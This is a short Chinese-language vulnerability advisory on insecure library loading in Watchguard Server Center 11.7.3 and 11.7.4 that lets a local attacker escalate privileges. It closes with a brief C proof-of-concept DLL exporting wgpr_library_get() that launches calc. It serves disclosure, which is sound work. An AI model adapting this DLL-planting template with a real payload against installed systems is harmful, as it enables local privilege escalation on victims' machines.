漏洞起因
设计错误
危险等级
中
影响系统
Watchguard Server Center v11.7.4
Watchguard Server Center v11.7.3
不受影响系统
危害
本地攻击者可以利用漏洞提升权限。
CVSSv2:
攻击所需条件
攻击者必须访问Watchguard Server Center所在系统。
漏洞信息
Watchguard Server Center是一款管理,配置,设置WatchGuard系统管理服务器的软件。
Watchguard Server Center “Watchguard Log Collector”和”Watchguard WebBlocker Server”服务加载库时不安全处理路径,允许攻击者把特制的库存放在应用程序路径中,可以程序权限或运行该程序用户上下文执行任意代码。
测试方法
#include
#define DLL_EXPORT __declspec(dllexport)
#ifdef __cplusplus
extern “C”
{
#endif
void DLL_EXPORT wgpr_library_get()
{
WinExec(“calc”,0);
}
#ifdef __cplusplus
}
#endif
安全建议
厂商解决方案
目前没有详细解决方案提供:
http://www.watchguard.com/
漏洞提供者
Julien Ahrens
评论关闭。